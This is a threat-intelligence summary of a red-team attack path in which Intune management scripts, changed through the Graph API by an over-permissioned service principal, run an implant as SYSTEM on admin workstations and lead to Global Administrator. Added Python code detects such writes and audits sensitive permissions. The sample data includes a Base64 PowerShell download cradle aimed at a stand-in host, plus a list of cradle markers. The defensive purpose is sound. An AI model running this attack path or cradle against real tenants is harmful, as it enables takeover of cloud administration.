“Exploiting Intune Permissions for Lateral Movement and Privilege Escalation in Entra ID”

Mandiant Red Team demonstrated how an attacker can abuse Intune permissions to run management scripts on Intune-managed Privileged Access Workstations (PAWs) and escalate to Microsoft Entra ID Global Administrator. The team used a service principal that had been granted DeviceManagementConfiguration.ReadWrite.All to modify Intune management scripts, which execute as NT AUTHORITY\SYSTEM, and recommends reviewing sensitive service principal permissions, enabling multi-admin approval, and monitoring Graph API activity. #MandiantRedTeam #MicrosoftEntraID

Keypoints

  • Mandiant Red Team assessed a client’s Microsoft Entra ID tenant and simulated an advanced compromise.
  • They abused a service principal granted DeviceManagementConfiguration.ReadWrite.All to modify Intune device management scripts.
  • Intune management scripts run at device startup as NT AUTHORITY\SYSTEM, giving high-privilege code execution on PAWs.
  • Mandiant used the Graph API to create or patch management scripts (scriptContent in Base64) to deploy a command-and-control implant.
  • The attacker waited for privileged role activation and impersonated the admin (e.g., via cookie/token theft) to obtain Global Administrator rights.
  • Recommended mitigations: review sensitive permissions, require multiple admin approvals for Intune changes, enable Graph API logging, and monitor service principal sign-ins.

MITRE Techniques

  • [T1068] Exploitation for Privilege Escalation – Used Intune-managed script execution on PAWs to escalate and ultimately obtain Global Administrator privileges (no software vulnerability was exploited; the path abuses a legitimate management feature); quote: ‘obtained privileges in the Entra ID tenant to add credentials to Entra ID service principals.’
  • [T1071] Application Layer Protocol – Deployed a remote implant to execute arbitrary commands on PAWs; quote: ‘By launching a command-and-control implant, Mandiant could execute arbitrary commands on the PAWs.’
  • [T1003] OS Credential Dumping – Credential access techniques are referenced as part of account compromise and token/cookie theft (for the impersonation step, T1539 Steal Web Session Cookie and T1528 Steal Application Access Token are the closer matches); quote: ‘Obtains credentials from operating systems and software.’
  • [T1098] Account Manipulation (T1098.001 Additional Cloud Credentials) – Added credentials to service principals and modified their permissions to gain unauthorized access; quote: ‘microsoft.directory/servicePrincipals/credentials/update.’
  • [T1210] Exploitation of Remote Services – Leveraged remote management capabilities (Intune/Graph API) to push and execute malicious scripts on managed devices (T1072 Software Deployment Tools is the more precise fit, since the scripts are delivered through an enterprise management tool rather than an exploited service); quote: ‘Intune’s device management scripts … are executed when the device starts, with administrative privileges (NT AUTHORITY\SYSTEM).’

Indicators of Compromise

  • [API endpoint / Domain] Microsoft Graph API usage for script modification – example: https://graph.microsoft.com/beta/deviceManagement/deviceManagementScripts (POST creates a script) and https://graph.microsoft.com/beta/deviceManagement/deviceManagementScripts/<script id> (PATCH updates an existing one)
  • [Script artifact / File name] Intune management script content and file name – example fields: “scriptContent”: “<PowerShell script in base64 encoding>”, “fileName”: “<filename>”, “runAsAccount”: “system” (used to deliver and execute the payload as SYSTEM)
  • [Permission / OAuth scope] Abused service principal permission – example: DeviceManagementConfiguration.ReadWrite.All (granted to a service principal that modified management scripts)

Mandiant Red Team showed a realistic attack path that bypasses an otherwise well-architected separation between on-premises and cloud administration. In the assessed environment, administrators used Intune-managed, cloud-native Privileged Access Workstations (PAWs) and dedicated cloud admin accounts, but a service principal holding DeviceManagementConfiguration.ReadWrite.All could modify Intune management scripts through the Microsoft Graph API. Because those scripts run at device startup as NT AUTHORITY\SYSTEM, a malicious script pushed this way executed with the highest local privileges on the PAWs.

The Red Team used Graph API requests (POST to create a deviceManagementScript, PATCH to update an existing one) with Base64-encoded PowerShell in the scriptContent field and runAsAccount set to system, deployed a command-and-control implant, and waited for a privileged administrator to activate an Entra ID role, then abused that admin's tokens/cookies to impersonate them and obtain Global Administrator privileges. Other Graph application permissions that can lead to similar outcomes (RoleManagement.ReadWrite.Directory, AppRoleAssignment.ReadWrite.All, Application.ReadWrite.All) were noted as sensitive even though they were not present in this tenant.
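To make the detection side of this attack path concrete, the following Python is an added example (not code from the Mandiant write-up). It flags create/update/delete calls to the deviceManagementScripts endpoint in records shaped like the MicrosoftGraphActivityLogs table, rating app-only (service principal) writes higher because that is the pattern described above, and it decodes a fetched script object so a responder can read what would run on the PAW and as which account. The column names are an assumption modelled on that table, the GUIDs and log rows are constructed, and the download-cradle markers are a heuristic chosen for this example rather than a list from the article.

```python
import base64
import re
from urllib.parse import urlparse

# Intune "management scripts" live under this Graph path (beta in the write-up;
# v1.0 matched too). Any write here, including /assign sub-resources, changes
# code that later runs on managed devices as NT AUTHORITY\SYSTEM.
SCRIPT_PATH_RE = re.compile(
    r"^/(?:beta|v1\.0)/deviceManagement/deviceManagementScripts(?:/|$)", re.IGNORECASE
)
WRITE_METHODS = {"POST", "PATCH", "PUT", "DELETE"}

# Strings a hand-written management script rarely needs but a staged implant
# launcher usually does. Heuristic chosen for this example, not from the article.
CRADLE_MARKERS = ("DownloadString", "Invoke-WebRequest", "iwr ", "IEX",
                  "Invoke-Expression", "-EncodedCommand", "-enc ", "FromBase64String")


def flag_script_writes(records):
    """Return one finding per write to the management-script endpoint.

    `records` are dicts using the MicrosoftGraphActivityLogs column names
    (RequestMethod, RequestUri, ServicePrincipalId, UserId, ...); that shape is
    an assumption modelled on the table. GETs are ignored, other paths skipped.
    """
    findings = []
    for rec in records:
        method = str(rec.get("RequestMethod", "")).upper()
        if method not in WRITE_METHODS:
            continue
        path = urlparse(str(rec.get("RequestUri", ""))).path
        if not SCRIPT_PATH_RE.match(path):
            continue
        # App-only (client-credential) tokens carry no signed-in user, so UserId
        # is empty: exactly the service-principal pattern the write-up describes.
        app_only = not rec.get("UserId")
        findings.append({
            "time": rec.get("TimeGenerated"),
            "method": method,
            "path": path,
            "service_principal": rec.get("ServicePrincipalId"),
            "app_only": app_only,
            "status": rec.get("ResponseStatusCode"),
            "severity": "high" if app_only else "medium",
        })
    return findings


def decode_script(script):
    """Decode a deviceManagementScript object as GET .../deviceManagementScripts/{id} returns it.

    Graph stores the PowerShell Base64-encoded in `scriptContent`; `runAsAccount`
    is "system" or "user". Returns the plaintext plus any cradle markers found.
    """
    raw = base64.b64decode(script["scriptContent"])
    text = raw.decode("utf-8-sig", errors="replace")   # tolerate a BOM from the uploaded .ps1
    markers = [m for m in CRADLE_MARKERS if m.lower() in text.lower()]
    return {
        "displayName": script.get("displayName"),
        "fileName": script.get("fileName"),
        "runAsAccount": script.get("runAsAccount"),
        "runs_as_system": script.get("runAsAccount") == "system",
        "content": text,
        "markers": markers,
    }


# Constructed rows (not real telemetry) in the MicrosoftGraphActivityLogs shape.
SP_ID = "00000000-0000-4000-8000-00000000aa01"
BASE = "https://graph.microsoft.com/beta/deviceManagement/"
SAMPLE_LOG = [
    {"TimeGenerated": "2024-05-01T02:10:00Z", "RequestMethod": "GET",
     "RequestUri": BASE + "deviceManagementScripts",
     "ServicePrincipalId": SP_ID, "UserId": "", "ResponseStatusCode": 200},
    {"TimeGenerated": "2024-05-01T02:11:30Z", "RequestMethod": "PATCH",
     "RequestUri": BASE + "deviceManagementScripts/00000000-0000-4000-8000-0000000000f1",
     "ServicePrincipalId": SP_ID, "UserId": "", "ResponseStatusCode": 200},
    {"TimeGenerated": "2024-05-01T09:00:00Z", "RequestMethod": "POST",
     "RequestUri": BASE + "deviceManagementScripts",
     "ServicePrincipalId": "00000000-0000-4000-8000-00000000bb02",
     "UserId": "00000000-0000-4000-8000-00000000cc03", "ResponseStatusCode": 201},
    {"TimeGenerated": "2024-05-01T09:05:00Z", "RequestMethod": "PATCH",
     "RequestUri": BASE + "deviceConfigurations/00000000-0000-4000-8000-0000000000d4",
     "ServicePrincipalId": SP_ID, "UserId": "", "ResponseStatusCode": 200},
]

# Constructed script object in the shape Graph returns. The body is a generic
# download cradle standing in for an implant launcher; the host is a reserved
# .invalid name and resolves nowhere.
_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/stage.ps1')\n"
SAMPLE_SCRIPT = {
    "displayName": "Set timezone",
    "fileName": "Set-TimeZone.ps1",
    "runAsAccount": "system",
    "scriptContent": base64.b64encode(_PAYLOAD.encode()).decode(),
}

if __name__ == "__main__":
    for f in flag_script_writes(SAMPLE_LOG):
        print(f"[{f['severity']}] {f['time']} {f['method']} {f['path']} "
              f"sp={f['service_principal']} app_only={f['app_only']}")
    d = decode_script(SAMPLE_SCRIPT)
    print(f"{d['fileName']} runAsAccount={d['runAsAccount']} markers={d['markers']}")
    print(d["content"], end="")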
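```

In production the same logic is usually a KQL query over the table rather than Python, but the two checks carry over directly: a write method against the deviceManagementScripts path, and an empty UserId marking an app-only caller. The decode step is for triage after the alert, since Graph activity logs do not record request bodies; the current script content has to be fetched and read.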

Mandiant recommends immediate steps: treat DeviceManagementConfiguration.ReadWrite.All as a sensitive permission and review every service principal granted it; enable Intune multi-admin approval (access policies) so that script and other sensitive changes require a second administrator's approval; enable Microsoft Graph activity logs for detection; use Microsoft Entra Workload ID Premium features to restrict service principal sign-ins to trusted locations and enable workload identity risk detections; and proactively monitor service principal sign-ins to detect anomalies and trigger rapid response.
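The first recommendation, reviewing which service principals hold the sensitive permission, is a lookup across two Graph objects: appRoleAssignments carry only an appRoleId, and the permission name lives in the appRoles list of the resource service principal (Microsoft Graph). The following Python is an added example, not code from the Mandiant post, that performs that resolution and flags the four permissions the text above names as sensitive. The JSON shapes mirror what GET /servicePrincipals/{id} and GET /servicePrincipals/{id}/appRoleAssignments return; the GUIDs and service principal names are constructed, so in a real tenant the appRoles list must be read from the live Microsoft Graph service principal rather than this sample.

```python
# Application permissions the page names as sensitive. The first is the one the
# Red Team abused; the other three were noted as routes to similar outcomes.
SENSITIVE_APP_ROLES = {
    "DeviceManagementConfiguration.ReadWrite.All",
    "RoleManagement.ReadWrite.Directory",
    "AppRoleAssignment.ReadWrite.All",
    "Application.ReadWrite.All",
}


def build_role_map(resource_sps):
    """Map (resource service principal id, appRoleId) -> permission name.

    `resource_sps` are service principal objects with their `appRoles`, as
    GET /servicePrincipals/{id} returns them. In a live tenant the relevant one
    is the Microsoft Graph SP (appId 00000003-0000-0000-c000-000000000000); the
    role GUIDs in SAMPLE_RESOURCE_SPS below are constructed, not Graph's real ones.
    """
    return {
        (sp["id"], role["id"]): role["value"]
        for sp in resource_sps
        for role in sp.get("appRoles", [])
    }


def find_sensitive_grants(assignments, resource_sps, sensitive=SENSITIVE_APP_ROLES):
    """Resolve appRoleAssignments to names; return the sensitive and unresolved ones.

    `assignments` are appRoleAssignment objects (principalId, principalDisplayName,
    resourceId, appRoleId) as GET /servicePrincipals/{id}/appRoleAssignments
    returns them. Only application permissions live here; delegated grants are
    separate oauth2PermissionGrant objects and are not covered by this check.
    """
    role_map = build_role_map(resource_sps)
    result = {"sensitive": [], "unresolved": []}
    for a in assignments:
        name = role_map.get((a["resourceId"], a["appRoleId"]))
        entry = {
            "principal": a.get("principalDisplayName"),
            "principalId": a["principalId"],
            "resourceId": a["resourceId"],
            "permission": name or a["appRoleId"],
        }
        if name is None:
            # The resource SP was not supplied: report the grant rather than
            # silently treating it as harmless.
            result["unresolved"].append(entry)
        elif name in sensitive:
            result["sensitive"].append(entry)
    return result


# Constructed resource SP standing in for Microsoft Graph (all GUIDs made up).
GRAPH_SP_ID = "10000000-0000-4000-8000-000000000001"
SAMPLE_RESOURCE_SPS = [{
    "id": GRAPH_SP_ID,
    "displayName": "Microsoft Graph",
    "appRoles": [
        {"id": "20000000-0000-4000-8000-000000000001",
         "value": "DeviceManagementConfiguration.ReadWrite.All"},
        {"id": "20000000-0000-4000-8000-000000000002",
         "value": "DeviceManagementConfiguration.Read.All"},
        {"id": "20000000-0000-4000-8000-000000000003", "value": "Mail.Send"},
        {"id": "20000000-0000-4000-8000-000000000004",
         "value": "Application.ReadWrite.All"},
    ],
}]


def _grant(principal, principal_id, role_id, resource=GRAPH_SP_ID):
    """Build one constructed appRoleAssignment object."""
    return {"principalDisplayName": principal, "principalId": principal_id,
            "resourceId": resource, "appRoleId": role_id}


# Constructed assignments: two sensitive, two benign, one with an unknown resource.
SAMPLE_ASSIGNMENTS = [
    _grant("Intune-Reporting", "30000000-0000-4000-8000-000000000001",
           "20000000-0000-4000-8000-000000000001"),   # ReadWrite.All -> sensitive
    _grant("Intune-Reporting", "30000000-0000-4000-8000-000000000001",
           "20000000-0000-4000-8000-000000000002"),   # Read.All -> fine
    _grant("Notifier", "30000000-0000-4000-8000-000000000002",
           "20000000-0000-4000-8000-000000000003"),   # Mail.Send -> fine
    _grant("Provisioner", "30000000-0000-4000-8000-000000000003",
           "20000000-0000-4000-8000-000000000004"),   # Application.ReadWrite.All -> sensitive
    _grant("Legacy-App", "30000000-0000-4000-8000-000000000004",
           "40000000-0000-4000-8000-000000000009",
           resource="50000000-0000-4000-8000-000000000005"),  # resource SP not supplied
]

if __name__ == "__main__":
    report = find_sensitive_grants(SAMPLE_ASSIGNMENTS, SAMPLE_RESOURCE_SPS)
    for e in report["sensitive"]:
        print(f"SENSITIVE  {e['principal']:<18} {e['permission']}")
    for e in report["unresolved"]:
        print(f"UNRESOLVED {e['principal']:<18} appRoleId={e['permission']} "
              f"resourceId={e['resourceId']}")
```

Reporting unresolved role IDs separately matters in practice: a tenant has many resource service principals, and a grant you cannot name is not one you have cleared. Feed the output into the same review that decides whether multi-admin approval and sign-in location restrictions should apply to each flagged principal.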

Read more: https://cloud.google.com/blog/topics/threat-intelligence/abusing-intune-permissions-entra-id-environments/